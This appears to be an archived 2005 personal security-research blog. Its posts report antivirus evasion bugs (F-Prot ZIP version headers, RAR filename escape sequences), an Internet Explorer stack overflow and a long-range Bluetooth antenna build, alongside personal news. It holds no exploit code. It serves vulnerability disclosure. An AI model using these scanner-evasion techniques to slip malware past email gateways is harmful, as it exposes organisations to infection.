Block all the others; if you like to ping, allow type 8 code 0 out and type 0 code 0 in.

Cisco IOS Template | Raven Alder

December 28, 2005 Posted by Thierry | Tags:Information| Comments?

F-Prot/Frisk Anti Virus bypass - ZIP Version Header

TZO-012005-Fprot - Yet another AV bypass
The F-Prot engine fails to decompress ZIP files whose version header is greater than 15. The consequence is that the F-Prot engine is unable to scan the virus/malware inside and consequently flags it as harmless. If used as an e-mail gateway solution, the offending e-mails will slip through.

Read more

November 3, 2005 Posted by Thierry | Tags:Research and Development| Comments?

Reproducible Stack Overflow in IE

I found what looks like a reproducible stack overflow in IE 6.0.2900.2180 (all patches applied); I am currently investigating whether it is exploitable or not.
-> vulndev@securityfocus.com



October 29, 2005 Posted by Thierry | Tags:Research and Development| Comments?

My Bluetooth Weapon

This is my version of the Bluetooth Sniper weapon: it features a medium-sized Yagi antenna combined with a 10x magnification scope and a metallised parabolic reflector which bundles the Bluetooth signal, further enhancing the range.

The interior is made from a Linksys USB dongle soldered to the Yagi and to a USB connector. Read more

October 18, 2005 Posted by Thierry | Tags:Research and Development| Comments?

RAR - Evasion of Anti Virus Detection

This bug is similar to the bug reported by Dr. Peter Bieringer; most vendors have since fixed the bug in their ZIP unpacking functions, however a similar bug exists in the RAR unpacking code and probably also in other archive unpacking functions.

Anti-virus scanners fail to correctly scan the files due to escape sequences within the filename and give them a clean bill; for a scanner used on an AV mail gateway this means the file is passed on without any warning.

Companies relying on anti-virus scanners on their e-mail gateways as their sole protection can be easily bypassed using these techniques. Read more (Errors found, needs to be redone)

October 17, 2005 Posted by Thierry | Tags:Research and Development| Comments?

Microsoft monitors Search queries - Windows XP SP2

My R&D section opens with this entry: "...It is possible for Microsoft™ to monitor and data-mine search terms even when those are searched over Google or other search engines. This is possible because Windows XP SP2 first submits the search terms to the MSN server and then redirects to the requested search engine..." Read more. More to come soon...

October 15, 2005 Posted by Thierry | Tags:Research and Development| Comments?

OSVDB member

I have been accepted as a member of the OSVDB project, and here is the first bug I mangled:

Kerio Personal/Server Firewall Driver Memory Locking Local DoS

OSVDB is an independent and open source database created by and for the security community. The goal of the project is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities. I encourage you to join the effort and to contribute to the project.

October 14, 2005 Posted by Thierry | Tags: hax0red | Comments?

Pictures from Defcon 13

I posted a few pictures from my Defcon 13 visit. Las Vegas and Defcon 13 were great; however, I have been disappointed by the level of some if not most presentations: some of them were perverted into some sort of one-man show, not really disclosing the essence of the talks but turning into drinking games, which may be entertaining to watch sometimes but not if you travelled over 14 hours in a plane just to be there. Greetings to Effugas, by the way. Defcon 13 Gallery

 

October 14, 2005 Posted by Thierry | Tags: hax0red | Comments?

My Visa had been hax0red

Apparently my card number was part of the "30 million Visa card hack"; however, unlike many other Visa offices, the responsible centre in Luxembourg (CETREL) immediately blocked the cards, notified the users and immediately issued new cards. Lacking a scanner, I took a picture of the letter in French and "English".

 

October 14, 2005 Posted by Thierry | Tags: hax0red | Comments?

First Post !

 

First post on my egocentric place in Cyberspace. It's all about me.

 

October 13, 2005 Posted by Thierry | Tags: Information | Comments?